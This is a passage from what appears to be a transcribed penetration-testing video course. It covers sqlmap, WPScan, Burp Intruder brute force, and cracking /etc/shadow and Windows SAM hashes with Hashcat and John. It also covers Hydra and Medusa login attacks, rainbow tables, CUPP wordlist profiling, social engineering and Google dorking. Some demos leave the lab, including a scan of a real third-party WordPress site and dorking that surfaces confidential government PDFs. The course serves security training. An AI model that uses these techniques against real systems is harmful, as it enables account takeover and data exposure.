here, and let's go to this website here. It's testphp.vonweb.com. It's an intentionally vulnerable website by Acunetics. Just you might go here, browse categories, posts, etc. You'll be able to see vulnerable URLs as well. Just copy that, open your terminal again, SQLmap -u, paste dbs, and the same thing will apply. This is the acquired database. You can do the same as we did before. That was actually the get vulnerability type of SQL injection. If the website is using post method, you can do some kind of workaround to do the same. Just make sure to launch the application called Burp Suite that comes with Kali. Once you click on that, that's the Burp Suite. Select a temporary project, then start Burp, and this is the application. Now we want to route our traffic from the browser to hit the proxy. Go to your preferences on just any browser and type network or proxy. You go to the proxy settings and configure a manual proxy. In this case, it's the local host listening on the port 8080. Just press OK. Now all the traffic will go to the proxy server before it hits the internet. Now I'll just open any website that can be vulnerable or uses the post method. So just go to this mildly vulnerable website, just put any username and any password and press login. Okay, now just go again to the Burp Suite, the proxy HTTP history, and check in the login page. Just see this is the post command, this is the host, the agent, etc. And these are the parameters that they were passed. We have txt username and txt password. Just select this all and right click and press copy to file and name this sqli.txt and save that. Now go to the terminal as we did before with the get vulnerability of the SQL injection and type SQLmap and then minus or -r, the name of the file, which is sqli.txt, then press enter. It will do the same steps and the same techniques it did with the get, since now we have the parameters that might be vulnerable. It will take some time, and if the website is vulnerable, it will give out the name of the database, and you can do the same hacking techniques we did earlier with the get method. WP-Scan is a very important tool that will discover lots of information about the WordPress platform you're targeting. It will give you information about the version installed, the theme used, the vulnerable component employed. You can as well enumerate the users, and WScan will give you the ability to brute force into these accounts. If you use it together with the Nick2 application, you will be able to assess your web server in a very good way. I went to turnkeylinux.org to download a WordPress virtual machine box. So you just go here, download this virtual machine that is compatible with VMware, install it, and follow the wizard in order to set it up. It's very easy and straightforward. So the IP of the machine here is 1.104. I'll go to my Kali machine here, open the terminal, let me zoom in, and use the command wp-scan --update. It will update the database, which is a prerequisite to start using the application. Now the trivial command is to use wp-scan --URL, then you specify the URL the domain name or the IP that you want to attack. In this case, it's 192.168.1.104. Just hit enter and wait for the results. So as you can see here, it gave us important information about the server type. It gave us as well information about, let us see, the name of the theme, some very important URLs, and it told us there are no plugins installed and no config backups found. We can append this command by using the eswitch, which is enumerate, and we can tell it to enumerate U, which means users. So now the scan will start over and it will attempt to enumerate the users. As you can see here, it has identified one user, which is the admin user. Now let me show you what can wpscan enumerate. If you search here for the eswitch, it can enumerate vulnerable plugins, vulnerable themes, DB exports, and users. So with the use of different switches, you'll be able to get more information about that. Now we have a very important piece of information, which is the admin username. Now we will try to brute force this admin username. For this case, I've created a simple word list here. It's wordlist.txt. But in your case, if you're doing a real world attack, you can go here to wp-whitesecurity.com, go to this link here, and download this zip file, which has over 1 million passwords related to WordPress. Just double click on that. Millions of passwords, which is very useful. You can as well use the RockU word list and the dark code word list as well, which has more than 14 million passwords. Now using this word list password I've created, I'll just append my command here. I'll use the switch P and specify the word list location, and then I use the switch U and specify the username, which is admin. You can as well set the number of threads, which are parallel attempts to try to brute force into the account. Press enter and wait for the magic. As you can see here, performing password attacks, it has identified the password, which is the complex password for the user admin. In order to prevent against users enumeration, try or avoid using usernames as nicknames, because this WP scan, it identifies usernames from the URLs used. And in order to prevent against password brute force attacks, just try to use some secure plugins that will limit the login attempts for certain usernames and IP addresses. Also make sure to set out password lockout or the account lockout time. Now let's do a scanning for a real website using WordPress, which is out there. Try to enumerate the users, and let me check this out here. So this is a real website that is hosted on the internet. I just want to show you that it doesn't only work for the default installation for WordPress, but this tool is very powerful and it can work on any WordPress installation. Nginx is the server, the location to the robots.txt file, some URLs, and this site has most used plugins. This is the link to the plugins the website uses. Upload directory has listing enabled, so if you go to this link here, you'll be able to browse files. The version installed is 4.9.8. Here is some information about the WordPress theme used, and here is the information about the users identified. It has identified one user, which is not the admin default user, and the time taken is 1 minute. Now that you have this username, you can try to brute force it, but I don't advise you to do that on websites that you don't own. Just try to keep this ethical. Burp Suite is a tool to perform web application testing. It's available in commercial and free editions. You can go to portswigger.net website to check the differences between these versions. I can tell you from now that it's a must-have tool for penetration testers. It's a very important tool as it does passive scanning, active scanning, brute force attacks, usernames and passwords. It also does analysis for the session IDs and the tokens generated to see the level of randomness. It also does fuzzing attacks just to insert random and garbage information into your text boxes just to check if these text boxes and the input are well sanitized. Now I have run my Metasploitable box here with the IP 1.107. As you know, it has lots of vulnerable web applications. And now I'll go to my Kali machine. First of all, just open Burp Suite. You can press on the icon here. I have already started that. First of all, make sure to go to the Proxy tab and turn off the interception. The interception is that all the requests will be queued here and you need to forward them to the destination server manually. Now we'll use this off for the time being. Now go to the tabs option here and you will see the port where Burp Suite is running on. Now open your web browser here and go to the preferences and make sure to configure the proxy settings to use the port 8080 on localhost. Now all the traffic that is going out from this browser will pass through our Burp Suite proxy before hitting the server. Let's close that and let's hit the Metasploitable box here with this IP 1.107 and let's go to the damn vulnerable web application here. As you can see that it is running. Now if you go back to your Burp Suite under the target tab and the sitemap subtab, you will see that it has identified the applications under the IP 1.107. We can right click on the main IP and we can select to spider this host. So this is the first action we usually do on Burp Suite. Spider this host. Just press on that. And would you like to modify the scope? If you say yes, we can like add or remove anything to the scope here under the scope tab. So you can add a URL as you want, but for the time being, I'll just use 1.107. Now it has detected that there is a form. We'll tell it just to ignore the form for the time being. It is like crawling the website and checking all the contents. If you go to the spider tab here, you will see that the spider is running. Now you can see all the status 200, that it's what's successful, the title of the pages. You can drill down to see all these content. So let's just stop the spider for now. If I go to the damn vulnerable web application, I'll use the username admin and password to log in. You'll notice here that Burp Suite has already identified this login here under the damn vulnerable web application folder. This is due to the passive scanning Burp Suite does. So if you go and browse the site of the damn vulnerable web application, just do a normal browsing to the site, Burp Suite will do like a kind of passive scanning all the pages that you visit. It takes a look at the pages and check the results for the vulnerabilities. If you go to the scanner tab here, you'll be able to see all the results obtained by Burp Suite, and this is actually available in the professional version. It will tell you the issue found on the page that you browse, and it will color code them based on the criticality of the issue. Now if you go back again to the target, now I'll start from scratch here and just open the web browser again, go to the damn vulnerable application and try to put random username and passwords. Minimize that and go to the Burp Suite again. You will see that it has identified this attempt. Now we want to brute force into this application trying to guess the username and password. You can right click here and press add or send to intruder. If you go to the intruder tab, go to the positions tab here, you will see that Burp Suite has identified these parameters that have been sent to the servers. Now we're only interested in brute forcing the username and password, so you can clear all, just select the username, add, and the password, press on add. Now we want to choose the type of the attack. We have sniper attack, battering, pitchfork, and cluster bomb. Sniper attack is used to brute force on one parameter. Meanwhile, cluster bomb is used to brute force more than one parameter. In our case, it's a cluster bomb. Going to the payload, you will see that it has identified two parameters. The parameter one is username in this case, and we will select the payload type, which is in our case is simple list. As well, same goes for the password attack or the password payload. Now going here for the payload options, we can add usernames, random usernames, and we can as well load our word list. If you have a word list with usernames, you can add that. Admin, in this case, I'll go to the second parameter and I will load a simple word list here, and I will add the password here. So as you can see, we have two parameters now with different usernames and passwords. The only thing left to do is to press on the start attack. Of course, in the professional version, you'll have more options to do. The attack will start and you'll be able to see the different combinations Burp Suite is performing. Eventually, if you're using the proper word lists, it will guess the username and the password. Scanning through the results here, you will see that the location is logged in for these unsuccessful attempts. Meanwhile, the location is indexed for this attempt, which is the correct one. A juicy topic indeed is how to gain access to systems. Well, if you have the password and how you can get the password, you can do that online attacks and non-technical attacks. Offline attack is usually when the target in question has been compromised and you have now the file that has the hashes of the password. Take the file to your own system and at your own convenience you will apply techniques such as dictionary, brute force, hybrid, rule-based or rainbow table attacks to crack the password. Meanwhile, online password attacks usually happen when you don't have access directly to the system and you're trying to gain access remotely. This is usually happen when you are presented, for example, by a web form and other types of authentication forms. The attacker will employ as well dictionary attacks, brute force attacks, and other types of attacks such as man-in-the-middle replay and wire sniffing. The main difference between both of the attacks is that a prerequisite for the offline attack is you acquiring the hash for the password. Meanwhile, the online password attack is kind of noisy and it will alert the administrator that certain kind of attack is happening and you might be as well blocked. Your IP might be blocked, some password policies might apply for the lockout period, and online attack is actually more difficult to execute than offline attacks. The non-technical attacks are usually straightforward, as we saw earlier with the phishing technique of social engineering. Shoulder surfing as well might happen in public places, and dumpster diving is when you dig into the trash of the victim to get more information about possible passwords. So a dictionary attack and a brute force attack is common between offline and online, and it's usually the easiest way to go for guessing a password. A dictionary attack is when the attacker uses a file that has possible words from the dictionary and tries to guess into the password manually or usually using a system, an application. A brute force attack happens when the attacker uses some character sets, like all the uppercase characters, all the lowercase characters, all the symbols and all the numbers, and the combination for the username and password takes place. Usually this is like a long process. A hybrid attack is a combination between dictionary attack and a brute force attack. Meanwhile, rule-based attack usually happen when you have information about the nature of the password. So if you have the password policy of the victim or the company or organization you're ethically attacking, you will feed this in the application, and statistically speaking, this will enhance the time needed to crack a password. A rainbow table is a list of pre-computed hashes and where corresponding password is there next to the hash which is cracked. And to do that, you just compare the hash that you have with the hash found in the rainbow tables, and if there's a match, here you go, you crack the password. For the online password attacks, same techniques apply in terms of dictionary attack and brute force attack, and many times it is easier to reset a password than to guess it. So if you have access to the system, you might boot from a Linux CD, and some applications will locate usernames, and here you go, you can just reset the password instead of taking a lot of time guessing it. Other types of a technique happen when you don't want to interact directly with the victim, but you're there on the network sniffing, capturing hashes, and reusing them to authenticate. A cryptographic hash function is a mathematical formula that helps you convert a given value to another string value that is irreversible. The resulting value after hashing is smaller compared to the data that passed through the function. Often these strings have fixed length. As you can see here on the screen, the input varies from fox to the red fox jumps over the blue dog. We are using the same cryptographic hash function, and the resulting hash or message digest is of the same length. Even if we change one character, like between this input here, the red fox jumps over the blue dog, and between this input here where we remove the V, the resulting value is a totally different hash. So in other words, hashes are fingerprints of some data, and it's about random looking characters that uniquely identify the data in question. What can we hash? If you look here at the right picture, you can hash anything. You can hash text, sentence, a password, you can hash a file, you can hash an MP3 file, you can hash any kind of file like ISO files, anything. We use hashes for three purposes, so mainly to verify files. So software creators often take a file download and run it through a hash function, and then they on their official site the hash and the file to download. So in order for you to verify that you've downloaded the right file, it hasn't been compromised or infected with malware, you just download the file and generate its hash and compare the hashes that are found on the website and the hashes that you generate, and if these match, then you have downloaded the right file. Let's take a simple example here. If you open PowerShell and let's go here to the root C. Suppose that you downloaded this file here and you just want to get the hash of this file in order to know that this file has not been compromised. You can do this by running this command, get file hash, and then the name of the file, and here you go. You will get this hash. Now you just have to compare it with the hash found on the website that you've downloaded the file from, and if there is a match, then this is the original file. The other purpose is for password storage. So there are two ways passwords are typically stored on a computer website. The first is in plain text, and if a crook steals a plain text database of passwords, they will be able to see the passwords in clear text, and this is so wrong. So the best way to store passwords is to hash them first. When you first create a password on a secure system, it hashes the password before storing it. So it does not store your actual password in the database. It stores the hash of the password and forgets what you actually typed. The next time you type in your password, it hashes what you typed in and compare the hash that it generated with the hash that is stored in the database and if there is a match, you will be granted an access. This is so valuable because if the hashes or if the hash database is stolen, it cannot be read by the bad guys, supposedly. Instead of seeing a list of passwords, they will see a list of hashes that can be useless. The third type of usage is database searching. So hashing can speed up the process of searching through a database. So that we're storing a long list of names in a table, and we need to find if a certain name is in that list. Well, the computer can do a search for the name, of course, but that might be a long process because it has to match a large string of characters. So we can significantly shorten that time by creating a hash for every name on the list, and as long as the hash is shorter than the average name length, then the search will be faster and easier. Here are the list of mostly used hashes. We have SHA1, 256, 512, MD4, MD5, LM and NTLM. Each produce a different length of hashes and characters, and here are some of the examples. It's good to note that difference between encryption and hashing. Encryption is a two-way function. Data is encrypted with the purpose of being decrypted at a later time, and this is the only good way to store and move data in a secure fashion. Meanwhile, hashing is never meant to be reversed. It's a one-way thing. So it's not meant to be a secure way to store or move data, but it's a purely used as an easy way to compare data or to compare blocks of data. As you might have realized, there is a problem with hashing since they produce a fixed length value, and we have a finite number of hashes for each type of algorithm, which makes collisions possible. So a collision is when two different data or inputs of data produce the same exact hash. This is rare, but it happens. So naturally, the longer the hash value, the less likely a collision will happen. We will now perform an offline password attack using an application called Hashcat. Hashcat is currently the world's fastest password cracking software, which supports different types of hashes, as we will see in the demo. Suppose that we were able to compromise my machine. I want to get the hash of the password stored here, which is usually under etc shadow file. Open this file, you'll be able to see the list of users on this machine and the password after the colon here in a hashed format. So we will take this file, I'll copy this file, and we'll name it hacked hash.lst. I'll reopen this file again using leafpad, and I will clean it. So remove the user from here and remove the colon, and go through the hash until the next colon, remove the next colon and the rest of the file. So now you have a clean file that only has hashes. Close it here. Now we open Hashcat. It's under password, offline attacks, Hashcat. Once you open it, the help menu will pop up. You'll be able to see different options that you will use. Mainly, we will use the M option, which specifies the hash type, the A option, which specifies the attack mode, and the O option, which specifies the output. So going down, these are the hash modes. It supports, as I said earlier, lots of hashes, MD4, MD5, SHAs. To make it easier, you can go to this site here, hashcat.net, and you'll be able to see them in a tabular format. The output formats are hash, plain text, etc. And the attack modes can be straight, which means dictionary attack or wordless attack, combination attack, brute force, or a hybrid wordless plus mask. And the device type supported can be CPU, GPU, or FPGA. So because this is the fastest application for password attacks, it will not only run on CPUs, it will be optimized to run on GPUs and FPGAs, which are application specific kind of processors. So let's go to the bread and butter here and type the command hashcat -m. M will specify the hash type that we want to crack. So actually, if you go here again to the leaf pad, this is the hash I'm trying to crack. Okay, if I need to know the type of encryption for this hash, I need to go to, let's leaf pad again, etc login. Just open this file here and go down until you see this here, encryption method. So the encryption method is SHA-512. If you go again to the site here, SHA-512 for Unix, the number is 1800. So type M space 1800, then A, which specifies the attack type. I'll go just a dictionary attack type. Then you will specify the output. The output is a cracked, will be put in the cracked.txt file, and then you refer to the location of the hash file, which is hash, which is again hacked hash.lst, and then I'll be using a simple word list here, word list.txt, and then I'll use force crack.txt signature unmatched. So here I'm missing a parameter, which is the output, and then here you go, it will start the cracking process. So here you can press on S to see the status. It will tell you that it is running, and this is the target hash that we want to crack. The time started, the estimated time, so it will take around 3 hours to finish. We are using this word list, so let's wait for it to finish. I'll just pause the video now and come back after 3 hours. If you press again on status, you will see that the progress is increasing, so let's just wait. Just make sure here that if you use the wrong hash type, the application will give you an error and will not be able to start cracking the hash. So make sure you do well-based research on the type of the hash that you are cracking. One of the applications here that might be beneficial is hash identifier. You open it here and you just paste the hash, and it will tell you what kind of hash is that. So I come again to check the application status, and now it is cracked, meaning that the password has been figured out. The duration taken is 1 hour 40 minutes. I just stopped the previous attack, changed the password to a more strong one. For that, my hash changed, but for you, just it's the same thing. To be able to see the password, just go to leafpad, the crack.txt. You'll be able to see that this is the hash that has been cracked to this password. So this is my password. In order to crack passwords in an offline mode, you must first obtain the hashes stored within the operating system. In our case, the operating system is Windows, and these hashes are stored in the SAM file, which is located in C Windows System 32 config. If you try to open this SAM file here, it will tell you that it cannot be opened. So obviously this file is not accessible while the operating system is booted. If you have physical access to the device in question, you can run a Linux Live CD, which is capable of reading NTFS drives and capable of mounting the Windows partitions. This way you will copy the SAM file easily to external media. If you're not comfortable doing that, you can use Nordal's offline anti-password editor, which will do the same as well. You will be able to read the SAM file. For the purpose of this tutorial, just go online to openwall.com and download a copy of pwdump or password dump. Just extract this folder to your Windows machine on the root C drive. This is password dump here. Then go to the command line, run it in admin mode, and go to the password dump. Then issue the command pwdump.exe, then redirect the output to crack.txt. If you go to the password dump folder and open the crack.txt, you will see that the hashes has been dumped here, and you will see the list of usernames and the IDs of the usernames. Then you will see two hashes separated by colon. The hash on the left side is the old LM hash, and the hash on the right side is the new NTLM hash, which is more secure. We'll take this hash here, copy it, because we want to crack it and try to crack it. Just copy this hash here and go to the Linux machine, open the terminal, and now we want to create a file that has this hash. So just use the command echo and then redirect the output to a file named windows hash.txt. So now if we do the list again, we have a text file here called windows hash. Just see the content of the windows hash, and here you go. In the windows hash we have this hash that we are trying to crack. Now we'll use the application John the Ripper in order to crack this hash. John the Ripper is actually one of my favorite password cracking tools because it supports lots of hashes. So it's very easy, just type in John and the help menu will pop up here. The syntax is very easy. Use John, options, and password file. So let's see the hashes supported by John. If you go write John, then list equal formats, you'll see all the hashes that are supported by John here. So let's try to crack this hash that we just got from the Windows machine. So John, and we need to specify the format. If you don't specify the format, John will kind of recognize the format on its own. But in order to make things easy, we will tell him the format type of the hash, which is NT. Then you specify file that you want to crack, which is windows hash.txt. Then you specify a word list, any word list. John can use its own word list. You can download extra word lists. See in the upcoming tutorials how to create good word lists. But for the sake of this video here, I've created my own word list. Word list equal, it's wl.lst, just a random word list that I'm using, and just hit enter. Okay, so obviously it figured out the password, and once John figures the password, it will store it in a file called john.pot. So try to locate john.pot, and here you go. Just copy that and try to open it in LeafPad, and here you go. This is our hash here, which is NT, and this is the cracked password. Once John cracks a hash, it stores it in the john.pot file. So if you want to crack the same hash again, it will not redo the effort unless you remove this file. John supports advanced password manipulation, cracking by using the rules. So if you want to see the rules, you can issue this command here, and these are the advanced rules that John might use in order to crack a hash. These rules include like adding trailing character, alphanumeric, capitalizing, etc. If you want to see the details of these rules, just locate the file john.conf and open it. And search for the word rule, and you will be able to see the details of the rules here, such as this rule is called single, and these are the password manipulation techniques that it does. Another rule is called word list, another rule is called extra, which mainly does insertion, overstrike of some characters, etc. So you can just explore them on your own. Hydra is a very famous online password cracking tool. It supports many protocols such as Cisco AAA, POP3, SMTP, SIP, Telnet, FTP, and SSH, and lots more. You go to Applications, Password Attacks, Online Attack, and then you press on this icon here. The syntax to use Hydra is very easy. You just provide it with a username, password, and the protocol you want to attack. You can provide it with a username if you type lowercase l, or user list if you type uppercase L. Same goes for password. You provide a lowercase p if you want to type the password, and you do uppercase P if you want to provide it with a password list. Same goes if you want to provide lots of targets you want to attack, and along with the protocol. So for this purpose, we need to attack a vulnerable Unix target machine, and the best thing to do is to go to Rapid7 website and install Metasploitable OS from there. You can go here and download Metasploitable. It will be downloaded as a VM machine. Just fill in the required information and download the VM machine, then go to VMware, open it, and import the machine, and you'll be able to run it easily. So you open the virtual machine from here, just refer to the extracted files, and then you'll be able to see Metasploitable here. Just run it, and you will be able to see this interface here. Okay, I'll clear the screen. So just type ifconfig just to see the IP address assigned to this machine, and it's 211.139. Open another terminal here just to see the services running on this machine, and here you go. It has lots of services running: FTP, SSH, Telnet, etc. So I want to try to attack this machine on the FTP service here. So I just type in Hydra, and I'll provide the username, which is msfadmin, and I will also provide a word list, which is rocku.txt. So here I'm trying to guess only the password, and I've provided the username manually. And the service to attack is FTP, and I'll provide the IP address here. So it's as simple as that. Just wait for a couple of minutes or even seconds before Hydra pops up the password. So let's wait. So it took a couple of seconds before being able to guess the password, which is msfadmin. We'll do the same for the Telnet services. So you just change the protocol here from FTP to Telnet, and just press enter, and Hydra will do the same. So let's wait again. Quite easy as well. It guessed the Telnet password, which is msfadmin as well. This is very easy. You can do the same for SSH and lots of other services. So get familiar with Hydra and install Metasploitable too, and just play around with it. Let's attempt to crack the password of the router that connects us to the internet. Let's ping it first, and here we go, we have a connection. For this purpose, we will use the tool called Medusa to try to figure out the password, and once you write Medusa, the switches menu will appear. It's actually quite easy to use, but first let me explain a bit about Medusa, which is a very fast and massively parallel modular login brute forcer. It has modules available to support almost any service that allows remote authentication using a password, such as FTP, POP3, Microsoft SQL, MySQL, SMTP, Telnet, and VNC. Compared to Hydra, which is process-based, Medusa is thread-based, which means it's actually much more faster than Hydra. So let's go to the bread and butter and try to crack the password. You just issue the command Medusa, and then you provide the host IP using the hswitch .1.1, and then you provide the username. Usually the default username is admin, so let's try admin here. The password, just enter the P in uppercase. It will be in the rocku.txt word list. Then provide the switch M and specify the protocol, which is HTTP. Just hit enter and watch Medusa does it work. As you can see here, Medusa is trying various passwords that are found in the rocku.txt file. The rocku.txt file is a very huge file containing more than 14 million modern passwords. It will go through all the options until it finds the right password for you. And after attempting around 740,000 passwords, the password was cracked. The best way to explain rainbow tables is to compare this kind of attack to the brute force and dictionary attacks. When an attacker brute forces a password, he has to generate a hash for every attempt or for every possible password combination he has. Then he compares the resulting hash to the hash in the table he wants to crack. If he gets a match, then he knows a password. So to speed things up, what if this attacker saves his brute force work by creating a table for all the password and hashes he was generating? Next time, he only compares two hashes. So this will save the computation time to convert an alphanumeric password to a hash and then compare this hash to the hash in the table he wants to crack. This will significantly speed up the cracking process. However, the table would have to be huge to have every possible password. So as you see, a rainbow table is a file of pre-computed password hashes. Rainbow cracking is proven to be more effective and less time consuming than brute force and dictionary attacks. So it uses less computer processing time but more storage. So before we can begin to crack hashes using rainbow tables, we need to generate these rainbow tables. We can generate them using the tool RTGen. Here you can provide the hashing algorithm, whether it's MD5, MD4, SHA-256, etc. And then your character set. It can be alphanumeric, lower alpha, it can be numeric, etc. And these two arguments are the size of the password, the length of the password, minimum and maximum. Then we have these parameters here, which are related, to be honest, to advanced cryptographic stuff. We will not go deep into that now. I'll give you just general guideline on that. The table index is actually the reduction function we will have in this rainbow table generated. Meanwhile, the chain length is simply the length of the chain you want to generate, and the chain number, as you can see, that rainbow table is actually an array of rainbow chains. So here you specify the numbers of the chains you want to have in this rainbow table, and the part index is actually to store the large rainbow table in smaller chunks. So don't worry about these, just focus on the first two or first couple of arguments. So let's start by creating rainbow table here for the MD5 algorithm. I will use numeric as my character set, and the minimum length is 1 and the maximum length is 8. Then I will use these default values like 0, 1000, 1000 and 0. Now it generated this rainbow table. If you go to list, you will be able to see, actually not here, we need to go to rainbow crack, and actually this is the directory here. So let's go to this directory and we will be able to see the rainbow table file generated here. This is the rainbow table file. Next, we need to sort this file. We will invoke the command rt_sort and just provide the path just by using a dot. After we have generated the rainbow table and sorted it, now it's time to crack a hash using this method. So we will use the command rcrack. You can see here the syntax, which is very easy. Just write rcrack, then use dot to refer to the rainbow tables found in the current directory, then provide the h argument and provide a hash. For this purpose, we will go here to an online MD5 hash generator and just select any string like this one. Just copy the hash here, then paste it and hit enter. It's very fast, as you see, and the results are here. This hash corresponds to this password. Generally, word lists available with password cracking programs or the word lists that you can download from the internet are used for general purposes. They have lots of random passwords. On top of that, they are huge in size. For example, you can search on the internet for a word list called Darkcode and another famous word list called DRUCU. This contains more than 14 million passwords that are compliant with the latest password policies. Suppose that you want to tailor your own word list for a special kind of attack. For this purpose, we'll be using two tools. The first one is called Crunch, which is available pre-installed with Kali, and the second tool is called Cup. You can go to the internet and search for Cup on GitHub, which is a common user password profiler, and you will go to this page. Just copy the link from here, go to your Kali machine, open the terminal and write the command git clone, then paste the URL and wait for it to be cloned on your local machine. Just to see, invoke the ls command, and here you go. It has created a directory called cupp. Just go to this directory, again list, you'll see the files populated here. We're interested to invoke this file here. You write Python, then the name of the file .py and the argument of -i. This will prompt you with lots of questions. So basically, this tool will gather information about the target and will use this information to generate its own word list. So let's see in the example. Suppose the name of the victim is John and the surname is Scott. The nickname is Johnny. The birth date is 1 March 1980. His partner's name is Ryan. Her nickname is Ray. Her birth date is 2/5/1985. Their child's name is Will. The child's nickname is Willie. The birth date is 5/7/1999. Pet's name is Tom. Company name is just a random company name. Innovate Corp. Do you want to add some keywords to the victim? If you have some keywords like you can describe him, he is handsome, he works in the technology field. So just imagine some of the words that this victim might be using. Do you want to add special characters to the end of the word? Yes. Do you want to add some random numbers to the end of the word? Yes. Leet mode, you enable the leet mode, yes or no? Leet mode is actually the usage of ASCII characters to replace Latin characters in ways that it reflects resemblance. So as you can see here, 1337, it resembles leet. And if I write, for example, password like this, I'm using the leet because the 0 resembles the O and the @ resembles the A. So I will say yes. And it will take some time to generate a word list containing more than 60,000 words. So let's open this list. It's called john.txt. I'll use leafpad to open john.txt. And here you go. This is the list containing all the permutations and all the combinations of the information provided to the victim. So probably the victim might be using one of these permutations because the passwords you use usually include your name, family name, your pet's name, birth date, your partner's name, etc. So this will help you do a more successful attack with high probability of guessing the password. Now moving to Crunch, just type Crunch and hit enter and you will see the syntax on how to run it. You will specify the minimum length of the password you want and the maximum length of the password you want. If you hit enter, it will use the default character set of alpha, lowercase. So just hit enter and now it will generate a huge word list containing more than 1 million passwords. So I'll just stop it here. To make things easier, you can specify the character set that you want. In this case, I'll use the character set of A, B, C, D. Hit enter. It will only use these character sets to generate password with minimum 4 and maximum 5. And here are the results. If you want to include numbers as well, you can add it to the character set. Hit enter and you will see the result. You can as well export this file by using the argument of O and then just rename it my word list.txt. It will just redirect the output to the file. You can see it here. And here we go. All the combinations and the possibilities from the character set you have chosen. Now, to make things more interesting, suppose that we want to add a pattern to the password. Patterns, we have to use symbols, special symbols. Add to specify lowercase, comma to specify uppercase, percentage sign to specify numbers, and the sign to specify symbols. Suppose that my pattern will be in the password, which is, let's say here, it's a 4-character password, just to make it easier for you to understand. I will always start with lowercase, and then I want to use number and then uppercase, and I want my password always to end with the letter Z. Okay, so we have a 4-letter password here. The length of the password is 4. This is the character set I'm choosing from, and the pattern is 4 characters. The first character is lowercase, then number, then uppercase, and a standard Z. So let's see how it goes. It will generate 1820 password. And here are all the permutations. Let's take this to an output file to make it easier. And open that. And here you go. As we specified here. So the first letter is lowercase, then number all the time, then uppercase, then Z. And these are all the possible combinations. Of course, you can make it more complex by using longer passwords and by using an extended character set. For this purpose, and as we've seen with rainbow tables before, the character set is found in a table or in a file called charset.txt. Actually, this is the one. So let's see the content of this file. And here you go. It has all the character sets, numeric, the alphanumeric, lower alpha, and lower alphanumeric, and the mixed alpha, etc. So let's use this file in order to generate a word list in Crunch. So I will use the same command here. I will delete this, and I will delete this for the time being, and just invoke the F argument to specify the file again. And now we need to specify the character set name. Again, let's open it in LeafPad and remember the character set name. For example, it's lower alpha dash numeric. Okay, so let's go to the command again and write lower alpha dash numeric. So it will use the lower alpha dash numeric character set from this file, and let's output this file to rainbow word list.txt, and on top of that let's zip it by using the Z argument and using the gunzip utility. So just press enter and wait for the result. Here we go. It has created this file here, rainbow word list.txt, with all the permutations and all the combinations from the lower alpha numeric character set under this file, and all the passwords are of length of 4 characters. So let's see that. Go to home and just double click on that file, and here you go. All the passwords are the length of 4 with all the combinations from the chosen character set. Here are some tips on how to protect against password attacks. First of all, you need to disable the legacy LM hashing, because as we said earlier, it is weaker than the new NTLM hashing. You can do that on Windows machine using group policies. I will show you the path here on my local machine. You just open run and invoke the gpedit command. You go to computer configuration, expand Windows settings, then expand security settings, then expand local policies, then go to security options. Under the security options, go to the section of network security and double click on the item do not store LAN manager hash value on next password change. It should be enabled. The next step is to use passwords that are longer than 14 characters because by default they will not be stored as LM hashes. The third tip is to use disk encryption such as BitLocker on Windows machine. BitLocker drive encryption is a data protection feature that integrates with the operating system and addresses the threats of data theft or exposure from lost, stolen, or inappropriately decommissioned computer. So, the data found on your hard drive cannot be used when your system is offline. The fourth tip is to use salting when invoking hash functions. Salting is a random data that is added as an input to the one-way hash function, so consider it as nonce. This will basically protect against dictionary attacks and rainbow table attacks. Social engineering is the act of manipulating people psychologically so that you get what you need from them. We're not using any technical approaches we learned earlier. The attack vectors can be pretexting, and it's the act of creating or inventing a scenario to lure the victim to participate in it. An example can be these emails you get usually that an African prince has passed away and your name appears on his will. Please provide us with a copy of your passport and a couple of bucks so that we process this further. Some people for this trick. Another attack vector is diversion theft, and it's actually used with courier guys or transport companies so that you persuade them that to deliver, for example, the shipment elsewhere, or not necessarily with the courier guys. For example, if you're going for a bank to deposit your money in an ATM machine, and maybe some guys will lure you that, okay, the ATM machine is currently out of order, you can just deposit your money in this, for example, a van related to a bank or certain kiosk related to a bank. So it's actually diverting the attention or the actual action that needs to be performed by the victim. Phishing is the act of sending emails that appear to come from a legitimate business or a bank or a credit card company, and it requires some kind of information or verification from the victim, such that the victim will provide information like credit card, CVV number, etc. So this kind of information. Spear phishing is the same as phishing, but it's actually targeting a specific group, and the rate of success is more than the phishing, because phishing is actually targeted towards the mass and it has a low rate of success. But in spear phishing, the attacker does more research and he attacks a certain group of people so that the probability of having a successful attack is increased. Baiting is when you trick people into, for example, you create a USB drive, USB flash disk, and you put a malicious file in it and you throw it in a public place such as a parking, elevator, walkways, and you might mark this as, for example, confidential or salaries of 2018, etc. So some people will fall for the trick and they will take this USB and just put it in their computers just out of curiosity to see what's there. And at this moment, the computer will be infected depending on the payload as well, and the attacker might have remote control over this computer. Tailgating is when the attacker seeks to a restricted area by following a person or entering behind a person who actually used his legitimate access, so that the person will have access to this area and without any kind of identification or any kind of questions asked. Phishing is voice phishing. It's where the criminal practice the use of social engineering over the telephone system to gain access to private or personal financial information, etc. Waterholing is actually same as phishing, but in a different context. In most of the cases, people are aware of phishing attacks and they are not ready to press on the links of any of these emails, but they are ready to press on the links on the websites they trust. So some kind of research will be done in this aspect so that the attacker will research the websites that are mostly visited by this user and will then check the vulnerabilities found on this website to inject these links. And the user will, since he's trusting the website, he will be more inclined on pressing on these links. So if I ask you a question, what is your primary source of data? Many people will answer by Google. And actually, an ocean of data out there in the world that is not accessed by Google. And it's actually depending on your use case. You need to collect relevant information to prepare for a certain kind of attack. Open source intelligence, or as abbreviated by OSINT, is the collection and analysis of information that is gathered from the public or open sources. And it has mainly 6 sources, such as media. You can look into newspapers, magazines, radio, television on information related to the target that you want to attack or compromise. You can look on the internet, which is the easiest way to do, such as, of course, YouTube, social media sites, Facebook, Twitter, Instagram, Google, blogs, discussion groups, some kind of websites like People and PQ, etc. Another source is public governmental data, such as speeches, websites, press conferences, telephone directories. Another source can be commercial data, such as professional databases and related databases. Another source is academic publications such as conferences, academic papers, journals, and last but not least, gray literature such as patents, reprints, technical reports, and business documents. Google dorking or Google hacking is a computer hacking technique that uses Google search and other Google applications to find security holes in the configuration of any computer node, website, etc. You will actually use the advanced search operators offered by Google in order to locate specific logic such as string, text within a result. So let's go directly to the examples. Google offers enhanced or advanced search operators such as in URL, in text, site, etc. So let's jump directly to the example to know what I'm talking about. So suppose that you want to search for a confidential document on the internet under a governmental website, for example. So here you have to know the parameters that you want to search for. Governmental site and confidential document and the type of the document. So we start this way. Site is the parameter or search operator that defines what kind of site we're looking in. So here we're looking for under a governmental site. File type, we're looking for suppose PDF file, and here you name the string that you want to search for. This document is confidential. So let's see what we'll have. We've got some PDF files here. Let's look into them. Let's just open these files here and search for the word confidential. Confirm there is no confidential here. This looks like confidential, huh? Confidential, this document is confidential, not for public inspection. So here you go, 